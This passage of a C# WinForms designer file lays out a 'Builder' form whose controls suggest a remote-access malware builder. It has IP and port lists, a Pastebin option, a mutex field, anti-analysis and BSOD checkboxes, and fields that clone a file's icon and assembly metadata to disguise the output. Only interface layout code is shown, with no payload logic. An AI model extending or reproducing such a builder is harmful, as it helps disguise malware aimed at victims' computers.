            this.txtProductVersion.DisabledState.FillColor = System.Drawing.Color.FromArgb(((int)(((byte)(226)))), ((int)(((byte)(226)))), ((int)(((byte)(226)))));
            this.txtProductVersion.DisabledState.ForeColor = System.Drawing.Color.FromArgb(((int)(((byte)(138)))), ((int)(((byte)(138)))), ((int)(((byte)(138)))));
            this.txtProductVersion.DisabledState.Parent = this.txtProductVersion;
            this.txtProductVersion.DisabledState.PlaceholderForeColor = System.Drawing.Color.FromArgb(((int)(((byte)(138)))), ((int)(((byte)(138)))), ((int)(((byte)(138)))));
            this.txtProductVersion.FillColor = System.Drawing.Color.FromArgb(((int)(((byte)(24)))), ((int)(((byte)(24)))), ((int)(((byte)(24)))));
            this.txtProductVersion.FocusedState.BorderColor = System.Drawing.Color.FromArgb(((int)(((byte)(4)))), ((int)(((byte)(143)))), ((int)(((byte)(110)))));
            this.txtProductVersion.FocusedState.Parent = this.txtProductVersion;
            this.txtProductVersion.Font = new System.Drawing.Font("Segoe UI", 9F);
            this.txtProductVersion.HoverState.BorderColor = System.Drawing.Color.FromArgb(((int)(((byte)(4)))), ((int)(((byte)(143)))), ((int)(((byte)(110)))));
            this.txtProductVersion.HoverState.Parent = this.txtProductVersion;
            this.txtProductVersion.Location = new System.Drawing.Point(349, 378);
            this.txtProductVersion.Margin = new System.Windows.Forms.Padding(4, 4, 4, 4);
            this.txtProductVersion.Name = "txtProductVersion";
            this.txtProductVersion.PasswordChar = '\0';
            this.txtProductVersion.PlaceholderText = "0.0.0.0";
            this.txtProductVersion.SelectedText = "";
            this.txtProductVersion.ShadowDecoration.Parent = this.txtProductVersion;
            this.txtProductVersion.Size = new System.Drawing.Size(253, 32);
            this.txtProductVersion.TabIndex = 130;
            this.txtFileVersion.BorderColor = System.Drawing.Color.FromArgb(((int)(((byte)(8)))), ((int)(((byte)(104)))), ((int)(((byte)(81)))));
            this.txtFileVersion.Cursor = System.Windows.Forms.Cursors.IBeam;
            this.txtFileVersion.DefaultText = "";
            this.txtFileVersion.DisabledState.BorderColor = System.Drawing.Color.FromArgb(((int)(((byte)(208)))), ((int)(((byte)(208)))), ((int)(((byte)(208)))));
            this.txtFileVersion.DisabledState.FillColor = System.Drawing.Color.FromArgb(((int)(((byte)(226)))), ((int)(((byte)(226)))), ((int)(((byte)(226)))));
            this.txtFileVersion.DisabledState.ForeColor = System.Drawing.Color.FromArgb(((int)(((byte)(138)))), ((int)(((byte)(138)))), ((int)(((byte)(138)))));
            this.txtFileVersion.DisabledState.Parent = this.txtFileVersion;
            this.txtFileVersion.DisabledState.PlaceholderForeColor = System.Drawing.Color.FromArgb(((int)(((byte)(138)))), ((int)(((byte)(138)))), ((int)(((byte)(138)))));
            this.txtFileVersion.FillColor = System.Drawing.Color.FromArgb(((int)(((byte)(24)))), ((int)(((byte)(24)))), ((int)(((byte)(24)))));
            this.txtFileVersion.FocusedState.BorderColor = System.Drawing.Color.FromArgb(((int)(((byte)(4)))), ((int)(((byte)(143)))), ((int)(((byte)(110)))));
            this.txtFileVersion.FocusedState.Parent = this.txtFileVersion;
            this.txtFileVersion.Font = new System.Drawing.Font("Segoe UI", 9F);
            this.txtFileVersion.HoverState.BorderColor = System.Drawing.Color.FromArgb(((int)(((byte)(4)))), ((int)(((byte)(143)))), ((int)(((byte)(110)))));
            this.txtFileVersion.HoverState.Parent = this.txtFileVersion;
            this.txtFileVersion.Location = new System.Drawing.Point(349, 417);
            this.txtFileVersion.Margin = new System.Windows.Forms.Padding(4, 4, 4, 4);
            this.txtFileVersion.Name = "txtFileVersion";
            this.txtFileVersion.PasswordChar = '\0';
            this.txtFileVersion.PlaceholderText = "0.0.0.0";
            this.txtFileVersion.SelectedText = "";
            this.txtFileVersion.ShadowDecoration.Parent = this.txtFileVersion;
            this.txtFileVersion.Size = new System.Drawing.Size(253, 32);
            this.txtFileVersion.TabIndex = 130;
            this.txtTrademarks.BorderColor = System.Drawing.Color.FromArgb(((int)(((byte)(8)))), ((int)(((byte)(104)))), ((int)(((byte)(81)))));
            this.txtTrademarks.Cursor = System.Windows.Forms.Cursors.IBeam;
            this.txtTrademarks.DefaultText = "";
            this.txtTrademarks.DisabledState.BorderColor = System.Drawing.Color.FromArgb(((int)(((byte)(208)))), ((int)(((byte)(208)))), ((int)(((byte)(208)))));
            this.txtTrademarks.DisabledState.FillColor = System.Drawing.Color.FromArgb(((int)(((byte)(226)))), ((int)(((byte)(226)))), ((int)(((byte)(226)))));
            this.txtTrademarks.DisabledState.ForeColor = System.Drawing.Color.FromArgb(((int)(((byte)(138)))), ((int)(((byte)(138)))), ((int)(((byte)(138)))));
            this.txtTrademarks.DisabledState.Parent = this.txtTrademarks;
            this.txtTrademarks.DisabledState.PlaceholderForeColor = System.Drawing.Color.FromArgb(((int)(((byte)(138)))), ((int)(((byte)(138)))), ((int)(((byte)(138)))));
            this.txtTrademarks.FillColor = System.Drawing.Color.FromArgb(((int)(((byte)(24)))), ((int)(((byte)(24)))), ((int)(((byte)(24)))));
            this.txtTrademarks.FocusedState.BorderColor = System.Drawing.Color.FromArgb(((int)(((byte)(4)))), ((int)(((byte)(143)))), ((int)(((byte)(110)))));
            this.txtTrademarks.FocusedState.Parent = this.txtTrademarks;
            this.txtTrademarks.Font = new System.Drawing.Font("Segoe UI", 9F);
            this.txtTrademarks.HoverState.BorderColor = System.Drawing.Color.FromArgb(((int)(((byte)(4)))), ((int)(((byte)(143)))), ((int)(((byte)(110)))));
            this.txtTrademarks.HoverState.Parent = this.txtTrademarks;
            this.txtTrademarks.Location = new System.Drawing.Point(349, 299);
            this.txtTrademarks.Margin = new System.Windows.Forms.Padding(4, 4, 4, 4);
            this.txtTrademarks.Name = "txtTrademarks";
            this.txtTrademarks.PasswordChar = '\0';
            this.txtTrademarks.PlaceholderText = "";
            this.txtTrademarks.SelectedText = "";
            this.txtTrademarks.ShadowDecoration.Parent = this.txtTrademarks;
            this.txtTrademarks.Size = new System.Drawing.Size(253, 32);
            this.txtTrademarks.TabIndex = 130;
            this.txtCompany.BorderColor = System.Drawing.Color.FromArgb(((int)(((byte)(8)))), ((int)(((byte)(104)))), ((int)(((byte)(81)))));
            this.txtCompany.Cursor = System.Windows.Forms.Cursors.IBeam;
            this.txtCompany.DefaultText = "";
            this.txtCompany.DisabledState.BorderColor = System.Drawing.Color.FromArgb(((int)(((byte)(208)))), ((int)(((byte)(208)))), ((int)(((byte)(208)))));
            this.txtCompany.DisabledState.FillColor = System.Drawing.Color.FromArgb(((int)(((byte)(226)))), ((int)(((byte)(226)))), ((int)(((byte)(226)))));
            this.txtCompany.DisabledState.ForeColor = System.Drawing.Color.FromArgb(((int)(((byte)(138)))), ((int)(((byte)(138)))), ((int)(((byte)(138)))));
            this.txtCompany.DisabledState.Parent = this.txtCompany;
            this.txtCompany.DisabledState.PlaceholderForeColor = System.Drawing.Color.FromArgb(((int)(((byte)(138)))), ((int)(((byte)(138)))), ((int)(((byte)(138)))));
            this.txtCompany.FillColor = System.Drawing.Color.FromArgb(((int)(((byte)(24)))), ((int)(((byte)(24)))), ((int)(((byte)(24)))));
            this.txtCompany.FocusedState.BorderColor = System.Drawing.Color.FromArgb(((int)(((byte)(4)))), ((int)(((byte)(143)))), ((int)(((byte)(110)))));
            this.txtCompany.FocusedState.Parent = this.txtCompany;
            this.txtCompany.Font = new System.Drawing.Font("Segoe UI", 9F);
            this.txtCompany.HoverState.BorderColor = System.Drawing.Color.FromArgb(((int)(((byte)(4)))), ((int)(((byte)(143)))), ((int)(((byte)(110)))));
            this.txtCompany.HoverState.Parent = this.txtCompany;
            this.txtCompany.Location = new System.Drawing.Point(349, 220);
            this.txtCompany.Margin = new System.Windows.Forms.Padding(4, 4, 4, 4);
            this.txtCompany.Name = "txtCompany";
            this.txtCompany.PasswordChar = '\0';
            this.txtCompany.PlaceholderText = "";
            this.txtCompany.SelectedText = "";
            this.txtCompany.ShadowDecoration.Parent = this.txtCompany;
            this.txtCompany.Size = new System.Drawing.Size(253, 32);
            this.txtCompany.TabIndex = 130;
            this.txtDescription.BorderColor = System.Drawing.Color.FromArgb(((int)(((byte)(8)))), ((int)(((byte)(104)))), ((int)(((byte)(81)))));
            this.txtDescription.Cursor = System.Windows.Forms.Cursors.IBeam;
            this.txtDescription.DefaultText = "";
            this.txtDescription.DisabledState.BorderColor = System.Drawing.Color.FromArgb(((int)(((byte)(208)))), ((int)(((byte)(208)))), ((int)(((byte)(208)))));
            this.txtDescription.DisabledState.FillColor = System.Drawing.Color.FromArgb(((int)(((byte)(226)))), ((int)(((byte)(226)))), ((int)(((byte)(226)))));
            this.txtDescription.DisabledState.ForeColor = System.Drawing.Color.FromArgb(((int)(((byte)(138)))), ((int)(((byte)(138)))), ((int)(((byte)(138)))));
            this.txtDescription.DisabledState.Parent = this.txtDescription;
            this.txtDescription.DisabledState.PlaceholderForeColor = System.Drawing.Color.FromArgb(((int)(((byte)(138)))), ((int)(((byte)(138)))), ((int)(((byte)(138)))));
            this.txtDescription.FillColor = System.Drawing.Color.FromArgb(((int)(((byte)(24)))), ((int)(((byte)(24)))), ((int)(((byte)(24)))));
            this.txtDescription.FocusedState.BorderColor = System.Drawing.Color.FromArgb(((int)(((byte)(4)))), ((int)(((byte)(143)))), ((int)(((byte)(110)))));
            this.txtDescription.FocusedState.Parent = this.txtDescription;
            this.txtDescription.Font = new System.Drawing.Font("Segoe UI", 9F);
            this.txtDescription.HoverState.BorderColor = System.Drawing.Color.FromArgb(((int)(((byte)(4)))), ((int)(((byte)(143)))), ((int)(((byte)(110)))));
            this.txtDescription.HoverState.Parent = this.txtDescription;
            this.txtDescription.Location = new System.Drawing.Point(349, 181);
            this.txtDescription.Margin = new System.Windows.Forms.Padding(4, 4, 4, 4);
            this.txtDescription.Name = "txtDescription";
            this.txtDescription.PasswordChar = '\0';
            this.txtDescription.PlaceholderText = "";
            this.txtDescription.SelectedText = "";
            this.txtDescription.ShadowDecoration.Parent = this.txtDescription;
            this.txtDescription.Size = new System.Drawing.Size(253, 32);
            this.txtDescription.TabIndex = 130;
            this.txtProduct.BorderColor = System.Drawing.Color.FromArgb(((int)(((byte)(8)))), ((int)(((byte)(104)))), ((int)(((byte)(81)))));
            this.txtProduct.Cursor = System.Windows.Forms.Cursors.IBeam;
            this.txtProduct.DefaultText = "";
            this.txtProduct.DisabledState.BorderColor = System.Drawing.Color.FromArgb(((int)(((byte)(208)))), ((int)(((byte)(208)))), ((int)(((byte)(208)))));
            this.txtProduct.DisabledState.FillColor = System.Drawing.Color.FromArgb(((int)(((byte)(226)))), ((int)(((byte)(226)))), ((int)(((byte)(226)))));
            this.txtProduct.DisabledState.ForeColor = System.Drawing.Color.FromArgb(((int)(((byte)(138)))), ((int)(((byte)(138)))), ((int)(((byte)(138)))));
            this.txtProduct.DisabledState.Parent = this.txtProduct;
            this.txtProduct.DisabledState.PlaceholderForeColor = System.Drawing.Color.FromArgb(((int)(((byte)(138)))), ((int)(((byte)(138)))), ((int)(((byte)(138)))));
            this.txtProduct.FillColor = System.Drawing.Color.FromArgb(((int)(((byte)(24)))), ((int)(((byte)(24)))), ((int)(((byte)(24)))));
            this.txtProduct.FocusedState.BorderColor = System.Drawing.Color.FromArgb(((int)(((byte)(4)))), ((int)(((byte)(143)))), ((int)(((byte)(110)))));
            this.txtProduct.FocusedState.Parent = this.txtProduct;
            this.txtProduct.Font = new System.Drawing.Font("Segoe UI", 9F);
            this.txtProduct.HoverState.BorderColor = System.Drawing.Color.FromArgb(((int)(((byte)(4)))), ((int)(((byte)(143)))), ((int)(((byte)(110)))));
            this.txtProduct.HoverState.Parent = this.txtProduct;
            this.txtProduct.Location = new System.Drawing.Point(349, 142);
            this.txtProduct.Margin = new System.Windows.Forms.Padding(4, 4, 4, 4);
            this.txtProduct.Name = "txtProduct";
            this.txtProduct.PasswordChar = '\0';
            this.txtProduct.PlaceholderText = "";
            this.txtProduct.SelectedText = "";
            this.txtProduct.ShadowDecoration.Parent = this.txtProduct;
            this.txtProduct.Size = new System.Drawing.Size(253, 32);
            this.txtProduct.TabIndex = 130;
            this.txtCopyright.BorderColor = System.Drawing.Color.FromArgb(((int)(((byte)(8)))), ((int)(((byte)(104)))), ((int)(((byte)(81)))));
            this.txtCopyright.Cursor = System.Windows.Forms.Cursors.IBeam;
            this.txtCopyright.DefaultText = "";
            this.txtCopyright.DisabledState.BorderColor = System.Drawing.Color.FromArgb(((int)(((byte)(208)))), ((int)(((byte)(208)))), ((int)(((byte)(208)))));
            this.txtCopyright.DisabledState.FillColor = System.Drawing.Color.FromArgb(((int)(((byte)(226)))), ((int)(((byte)(226)))), ((int)(((byte)(226)))));
            this.txtCopyright.DisabledState.ForeColor = System.Drawing.Color.FromArgb(((int)(((byte)(138)))), ((int)(((byte)(138)))), ((int)(((byte)(138)))));
            this.txtCopyright.DisabledState.Parent = this.txtCopyright;
            this.txtCopyright.DisabledState.PlaceholderForeColor = System.Drawing.Color.FromArgb(((int)(((byte)(138)))), ((int)(((byte)(138)))), ((int)(((byte)(138)))));
            this.txtCopyright.FillColor = System.Drawing.Color.FromArgb(((int)(((byte)(24)))), ((int)(((byte)(24)))), ((int)(((byte)(24)))));
            this.txtCopyright.FocusedState.BorderColor = System.Drawing.Color.FromArgb(((int)(((byte)(4)))), ((int)(((byte)(143)))), ((int)(((byte)(110)))));
            this.txtCopyright.FocusedState.Parent = this.txtCopyright;
            this.txtCopyright.Font = new System.Drawing.Font("Segoe UI", 9F);
            this.txtCopyright.HoverState.BorderColor = System.Drawing.Color.FromArgb(((int)(((byte)(4)))), ((int)(((byte)(143)))), ((int)(((byte)(110)))));
            this.txtCopyright.HoverState.Parent = this.txtCopyright;
            this.txtCopyright.Location = new System.Drawing.Point(349, 260);
            this.txtCopyright.Margin = new System.Windows.Forms.Padding(4, 4, 4, 4);
            this.txtCopyright.Name = "txtCopyright";
            this.txtCopyright.PasswordChar = '\0';
            this.txtCopyright.PlaceholderText = "";
            this.txtCopyright.SelectedText = "";
            this.txtCopyright.ShadowDecoration.Parent = this.txtCopyright;
            this.txtCopyright.Size = new System.Drawing.Size(253, 32);
            this.txtCopyright.TabIndex = 130;
            this.txtOriginalFilename.BorderColor = System.Drawing.Color.FromArgb(((int)(((byte)(8)))), ((int)(((byte)(104)))), ((int)(((byte)(81)))));
            this.txtOriginalFilename.Cursor = System.Windows.Forms.Cursors.IBeam;
            this.txtOriginalFilename.DefaultText = "";
            this.txtOriginalFilename.DisabledState.BorderColor = System.Drawing.Color.FromArgb(((int)(((byte)(208)))), ((int)(((byte)(208)))), ((int)(((byte)(208)))));
            this.txtOriginalFilename.DisabledState.FillColor = System.Drawing.Color.FromArgb(((int)(((byte)(226)))), ((int)(((byte)(226)))), ((int)(((byte)(226)))));
            this.txtOriginalFilename.DisabledState.ForeColor = System.Drawing.Color.FromArgb(((int)(((byte)(138)))), ((int)(((byte)(138)))), ((int)(((byte)(138)))));
            this.txtOriginalFilename.DisabledState.Parent = this.txtOriginalFilename;
            this.txtOriginalFilename.DisabledState.PlaceholderForeColor = System.Drawing.Color.FromArgb(((int)(((byte)(138)))), ((int)(((byte)(138)))), ((int)(((byte)(138)))));
            this.txtOriginalFilename.FillColor = System.Drawing.Color.FromArgb(((int)(((byte)(24)))), ((int)(((byte)(24)))), ((int)(((byte)(24)))));
            this.txtOriginalFilename.FocusedState.BorderColor = System.Drawing.Color.FromArgb(((int)(((byte)(4)))), ((int)(((byte)(143)))), ((int)(((byte)(110)))));
            this.txtOriginalFilename.FocusedState.Parent = this.txtOriginalFilename;
            this.txtOriginalFilename.Font = new System.Drawing.Font("Segoe UI", 9F);
            this.txtOriginalFilename.HoverState.BorderColor = System.Drawing.Color.FromArgb(((int)(((byte)(4)))), ((int)(((byte)(143)))), ((int)(((byte)(110)))));
            this.txtOriginalFilename.HoverState.Parent = this.txtOriginalFilename;
            this.txtOriginalFilename.Location = new System.Drawing.Point(349, 338);
            this.txtOriginalFilename.Margin = new System.Windows.Forms.Padding(4, 4, 4, 4);
            this.txtOriginalFilename.Name = "txtOriginalFilename";
            this.txtOriginalFilename.PasswordChar = '\0';
            this.txtOriginalFilename.PlaceholderText = "";
            this.txtOriginalFilename.SelectedText = "";
            this.txtOriginalFilename.ShadowDecoration.Parent = this.txtOriginalFilename;
            this.txtOriginalFilename.Size = new System.Drawing.Size(253, 32);
            this.txtOriginalFilename.TabIndex = 130;
            this.btnAssembly.CheckedState.BorderColor = System.Drawing.Color.FromArgb(((int)(((byte)(94)))), ((int)(((byte)(148)))), ((int)(((byte)(255)))));
            this.btnAssembly.CheckedState.BorderRadius = 2;
            this.btnAssembly.CheckedState.BorderThickness = 0;
            this.btnAssembly.CheckedState.FillColor = System.Drawing.Color.FromArgb(((int)(((byte)(8)))), ((int)(((byte)(104)))), ((int)(((byte)(81)))));
            this.btnAssembly.CheckedState.Parent = this.btnAssembly;
            this.btnAssembly.Location = new System.Drawing.Point(149, 69);
            this.btnAssembly.Margin = new System.Windows.Forms.Padding(4, 4, 4, 4);
            this.btnAssembly.Name = "btnAssembly";
            this.btnAssembly.ShadowDecoration.Parent = this.btnAssembly;
            this.btnAssembly.Size = new System.Drawing.Size(32, 30);
            this.btnAssembly.TabIndex = 127;
            this.btnAssembly.Text = "guna2CustomCheckBox1";
            this.btnAssembly.UncheckedState.BorderColor = System.Drawing.Color.Transparent;
            this.btnAssembly.UncheckedState.BorderRadius = 2;
            this.btnAssembly.UncheckedState.BorderThickness = 0;
            this.btnAssembly.UncheckedState.FillColor = System.Drawing.Color.Transparent;
            this.btnAssembly.UncheckedState.Parent = this.btnAssembly;
            this.btnAssembly.Click += new System.EventHandler(this.BtnAssembly_CheckedChanged);
            this.chkIcon.CheckedState.BorderColor = System.Drawing.Color.FromArgb(((int)(((byte)(94)))), ((int)(((byte)(148)))), ((int)(((byte)(255)))));
            this.chkIcon.CheckedState.BorderRadius = 2;
            this.chkIcon.CheckedState.BorderThickness = 0;
            this.chkIcon.CheckedState.FillColor = System.Drawing.Color.FromArgb(((int)(((byte)(8)))), ((int)(((byte)(104)))), ((int)(((byte)(81)))));
            this.chkIcon.CheckedState.Parent = this.chkIcon;
            this.chkIcon.Location = new System.Drawing.Point(733, 69);
            this.chkIcon.Margin = new System.Windows.Forms.Padding(4, 4, 4, 4);
            this.chkIcon.Name = "chkIcon";
            this.chkIcon.ShadowDecoration.Parent = this.chkIcon;
            this.chkIcon.Size = new System.Drawing.Size(32, 30);
            this.chkIcon.TabIndex = 127;
            this.chkIcon.Text = "guna2CustomCheckBox1";
            this.chkIcon.UncheckedState.BorderColor = System.Drawing.Color.Transparent;
            this.chkIcon.UncheckedState.BorderRadius = 2;
            this.chkIcon.UncheckedState.BorderThickness = 0;
            this.chkIcon.UncheckedState.FillColor = System.Drawing.Color.Transparent;
            this.chkIcon.UncheckedState.Parent = this.chkIcon;
            this.chkIcon.Click += new System.EventHandler(this.ChkIcon_CheckedChanged);
            this.btnClone.Animated = true;
            this.btnClone.BorderColor = System.Drawing.Color.Maroon;
            this.btnClone.BorderRadius = 5;
            this.btnClone.CheckedState.Parent = this.btnClone;
            this.btnClone.CustomImages.Parent = this.btnClone;
            this.btnClone.DisabledState.BorderColor = System.Drawing.Color.DarkGray;
            this.btnClone.DisabledState.CustomBorderColor = System.Drawing.Color.DarkGray;
            this.btnClone.DisabledState.FillColor = System.Drawing.Color.FromArgb(((int)(((byte)(169)))), ((int)(((byte)(169)))), ((int)(((byte)(169)))));
            this.btnClone.DisabledState.ForeColor = System.Drawing.Color.FromArgb(((int)(((byte)(141)))), ((int)(((byte)(141)))), ((int)(((byte)(141)))));
            this.btnClone.DisabledState.Parent = this.btnClone;
            this.btnClone.FillColor = System.Drawing.Color.FromArgb(((int)(((byte)(8)))), ((int)(((byte)(104)))), ((int)(((byte)(81)))));
            this.btnClone.Font = new System.Drawing.Font("Segoe UI", 9F);
            this.btnClone.ForeColor = System.Drawing.Color.White;
            this.btnClone.HoverState.Parent = this.btnClone;
            this.btnClone.Location = new System.Drawing.Point(349, 60);
            this.btnClone.Margin = new System.Windows.Forms.Padding(4, 4, 4, 4);
            this.btnClone.Name = "btnClone";
            this.btnClone.ShadowDecoration.Parent = this.btnClone;
            this.btnClone.Size = new System.Drawing.Size(253, 46);
            this.btnClone.TabIndex = 126;
            this.btnClone.Text = "Choose icon";
            this.btnClone.Click += new System.EventHandler(this.BtnClone_Click);
            this.btnIcon.Animated = true;
            this.btnIcon.BorderColor = System.Drawing.Color.Maroon;
            this.btnIcon.BorderRadius = 5;
            this.btnIcon.CheckedState.Parent = this.btnIcon;
            this.btnIcon.CustomImages.Parent = this.btnIcon;
            this.btnIcon.DisabledState.BorderColor = System.Drawing.Color.DarkGray;
            this.btnIcon.DisabledState.CustomBorderColor = System.Drawing.Color.DarkGray;
            this.btnIcon.DisabledState.FillColor = System.Drawing.Color.FromArgb(((int)(((byte)(169)))), ((int)(((byte)(169)))), ((int)(((byte)(169)))));
            this.btnIcon.DisabledState.ForeColor = System.Drawing.Color.FromArgb(((int)(((byte)(141)))), ((int)(((byte)(141)))), ((int)(((byte)(141)))));
            this.btnIcon.DisabledState.Parent = this.btnIcon;
            this.btnIcon.FillColor = System.Drawing.Color.FromArgb(((int)(((byte)(8)))), ((int)(((byte)(104)))), ((int)(((byte)(81)))));
            this.btnIcon.Font = new System.Drawing.Font("Segoe UI", 9F);
            this.btnIcon.ForeColor = System.Drawing.Color.White;
            this.btnIcon.HoverState.Parent = this.btnIcon;
            this.btnIcon.Location = new System.Drawing.Point(787, 60);
            this.btnIcon.Margin = new System.Windows.Forms.Padding(4, 4, 4, 4);
            this.btnIcon.Name = "btnIcon";
            this.btnIcon.ShadowDecoration.Parent = this.btnIcon;
            this.btnIcon.Size = new System.Drawing.Size(200, 46);
            this.btnIcon.TabIndex = 126;
            this.btnIcon.Text = "Clone File";
            this.btnIcon.Click += new System.EventHandler(this.BtnIcon_Click);
            this.chkBsod.AutoSize = true;
            this.chkBsod.Location = new System.Drawing.Point(1063, 486);
            this.chkBsod.Margin = new System.Windows.Forms.Padding(3, 2, 3, 2);
            this.chkBsod.Name = "chkBsod";
            this.chkBsod.Size = new System.Drawing.Size(67, 20);
            this.chkBsod.TabIndex = 131;
            this.chkBsod.Text = "BSOD";
            this.chkBsod.UseVisualStyleBackColor = true;
            this.guna2DragControl2.TargetControl = this.guna2Panel1;
            this.guna2BorderlessForm1.AnimateWindow = true;
            this.guna2BorderlessForm1.ContainerControl = this;
            this.guna2BorderlessForm1.DockIndicatorColor = System.Drawing.Color.FromArgb(((int)(((byte)(8)))), ((int)(((byte)(104)))), ((int)(((byte)(81)))));
            this.guna2BorderlessForm1.ShadowColor = System.Drawing.Color.FromArgb(((int)(((byte)(8)))), ((int)(((byte)(104)))), ((int)(((byte)(81)))));
            this.btnMutex.Animated = true;
            this.btnMutex.BorderColor = System.Drawing.Color.Maroon;
            this.btnMutex.BorderRadius = 5;
            this.btnMutex.CheckedState.Parent = this.btnMutex;
            this.btnMutex.CustomImages.Parent = this.btnMutex;
            this.btnMutex.DisabledState.BorderColor = System.Drawing.Color.DarkGray;
            this.btnMutex.DisabledState.CustomBorderColor = System.Drawing.Color.DarkGray;
            this.btnMutex.DisabledState.FillColor = System.Drawing.Color.FromArgb(((int)(((byte)(169)))), ((int)(((byte)(169)))), ((int)(((byte)(169)))));
            this.btnMutex.DisabledState.ForeColor = System.Drawing.Color.FromArgb(((int)(((byte)(141)))), ((int)(((byte)(141)))), ((int)(((byte)(141)))));
            this.btnMutex.DisabledState.Parent = this.btnMutex;
            this.btnMutex.FillColor = System.Drawing.Color.FromArgb(((int)(((byte)(8)))), ((int)(((byte)(104)))), ((int)(((byte)(81)))));
            this.btnMutex.Font = new System.Drawing.Font("Segoe UI", 9F);
            this.btnMutex.ForeColor = System.Drawing.Color.White;
            this.btnMutex.HoverState.Parent = this.btnMutex;
            this.btnMutex.Location = new System.Drawing.Point(888, 400);
            this.btnMutex.Margin = new System.Windows.Forms.Padding(4);
            this.btnMutex.Name = "btnMutex";
            this.btnMutex.ShadowDecoration.Parent = this.btnMutex;
            this.btnMutex.Size = new System.Drawing.Size(100, 32);
            this.btnMutex.TabIndex = 135;
            this.btnMutex.Text = "Random";
            this.btnMutex.Click += new System.EventHandler(this.btnMutex_Click);
            this.AutoScaleDimensions = new System.Drawing.SizeF(8F, 16F);
            this.AutoScaleMode = System.Windows.Forms.AutoScaleMode.Font;
            this.BackColor = System.Drawing.Color.FromArgb(((int)(((byte)(255)))), ((int)(((byte)(192)))), ((int)(((byte)(128)))));
            this.ClientSize = new System.Drawing.Size(1333, 810);
            this.Controls.Add(this.guna2ShadowPanel1);
            this.ForeColor = System.Drawing.Color.Transparent;
            this.FormBorderStyle = System.Windows.Forms.FormBorderStyle.None;
            this.Margin = new System.Windows.Forms.Padding(3, 2, 3, 2);
            this.Name = "FormBuilder";
            this.StartPosition = System.Windows.Forms.FormStartPosition.CenterScreen;
            this.Text = "Builder";
            this.Load += new System.EventHandler(this.Builder_Load);
            ((System.ComponentModel.ISupportInitialize)(this.picIcon)).EndInit();
            ((System.ComponentModel.ISupportInitialize)(this.numDelay)).EndInit();
            this.guna2ShadowPanel1.ResumeLayout(false);
            this.guna2Panel1.ResumeLayout(false);
            this.guna2Panel1.PerformLayout();
            this.guna2TabControl1.ResumeLayout(false);
            this.tabPage1.ResumeLayout(false);
            this.guna2ShadowPanel2.ResumeLayout(false);
            this.guna2ShadowPanel2.PerformLayout();
            this.tabPage2.ResumeLayout(false);
            this.guna2ShadowPanel4.ResumeLayout(false);
            this.guna2ShadowPanel4.PerformLayout();
            this.tabPage3.ResumeLayout(false);
            this.tabPage3.PerformLayout();
            this.guna2ShadowPanel3.ResumeLayout(false);
            this.guna2ShadowPanel3.PerformLayout();
            this.ResumeLayout(false);

		}

		private global::System.ComponentModel.IContainer components;

		private global::System.DirectoryServices.DirectoryEntry directoryEntry1;

		private global::System.Windows.Forms.ToolTip toolTip1;

		private global::System.Windows.Forms.Label label3;

		private global::System.Windows.Forms.Label label4;

		private global::System.Windows.Forms.PictureBox picIcon;

		private global::System.Windows.Forms.Label label14;

		private global::System.Windows.Forms.Label label13;

		private global::System.Windows.Forms.Label label12;

		private global::System.Windows.Forms.Label label11;

		private global::System.Windows.Forms.Label label10;

		private global::System.Windows.Forms.Label label9;

		private global::System.Windows.Forms.Label label7;

		private global::System.Windows.Forms.Label label8;

		private global::System.Windows.Forms.Label label6;

		private global::System.Windows.Forms.Label label15;

		private global::Guna.UI2.WinForms.Guna2ComboBox comboBoxFolder;

		private global::System.Windows.Forms.Label label18;

		private global::System.Windows.Forms.Label label19;

		private global::Guna.UI2.WinForms.Guna2NumericUpDown numDelay;

		private global::System.Windows.Forms.Label label16;

		private global::System.Windows.Forms.ListBox YourListPorts;

		private global::System.Windows.Forms.ListBox YourListIPs;

		private global::Guna.UI2.WinForms.Guna2DragControl guna2DragControl1;

		private global::Guna.UI2.WinForms.Guna2ShadowPanel guna2ShadowPanel1;

		private global::Guna.UI2.WinForms.Guna2CheckBox chkPaste_bin;

		private global::Guna.UI2.WinForms.Guna2TabControl guna2TabControl1;

		private global::System.Windows.Forms.TabPage tabPage1;

		private global::System.Windows.Forms.TabPage tabPage2;

		private global::System.Windows.Forms.TabPage tabPage3;

		private global::Guna.UI2.WinForms.Guna2Panel guna2Panel1;

		private global::Guna.UI2.WinForms.Guna2ControlBox guna2ControlBox1;

		private global::System.Windows.Forms.Label label1;

		private global::Guna.UI2.WinForms.Guna2ShadowPanel guna2ShadowPanel2;

		private global::Guna.UI2.WinForms.Guna2ShadowPanel guna2ShadowPanel4;

		private global::Guna.UI2.WinForms.Guna2ShadowPanel guna2ShadowPanel3;

		private global::Guna.UI2.WinForms.Guna2DragControl guna2DragControl2;

		private global::Guna.UI2.WinForms.Guna2Button btnBuild;

		private global::Guna.UI2.WinForms.Guna2Button btnRemoveIP;

		private global::Guna.UI2.WinForms.Guna2Button btnRemovePort;

		private global::Guna.UI2.WinForms.Guna2Button btnAddIP;

		private global::Guna.UI2.WinForms.Guna2Button btnAddPort;

		private global::Guna.UI2.WinForms.Guna2TextBox textIP;

		private global::Guna.UI2.WinForms.Guna2TextBox txtPaste_bin;

		private global::Guna.UI2.WinForms.Guna2TextBox textPort;

		private global::Guna.UI2.WinForms.Guna2Button btnClone;

		private global::Guna.UI2.WinForms.Guna2Button btnIcon;

		private global::Guna.UI2.WinForms.Guna2CustomCheckBox chkIcon;

		private global::Guna.UI2.WinForms.Guna2CustomCheckBox btnAssembly;

		private global::Guna.UI2.WinForms.Guna2TextBox textFilename;

		private global::Guna.UI2.WinForms.Guna2CustomCheckBox chkAnti;

		private global::Guna.UI2.WinForms.Guna2CustomCheckBox chkAntiProcess;

		private global::Guna.UI2.WinForms.Guna2CustomCheckBox checkBox1;

		private global::Guna.UI2.WinForms.Guna2TextBox txtIcon;

		private global::Guna.UI2.WinForms.Guna2TextBox txtOriginalFilename;

		private global::Guna.UI2.WinForms.Guna2TextBox txtProductVersion;

		private global::Guna.UI2.WinForms.Guna2TextBox txtFileVersion;

		private global::Guna.UI2.WinForms.Guna2TextBox txtTrademarks;

		private global::Guna.UI2.WinForms.Guna2TextBox txtCompany;

		private global::Guna.UI2.WinForms.Guna2TextBox txtDescription;

		private global::Guna.UI2.WinForms.Guna2TextBox txtProduct;

		private global::Guna.UI2.WinForms.Guna2TextBox txtCopyright;

		private global::System.Windows.Forms.CheckBox chkBsod;

		private global::Guna.UI2.WinForms.Guna2BorderlessForm guna2BorderlessForm1;

		private global::Guna.UI2.WinForms.Guna2TextBox txtGroup;

		private global::Guna.UI2.WinForms.Guna2TextBox txtMutex;

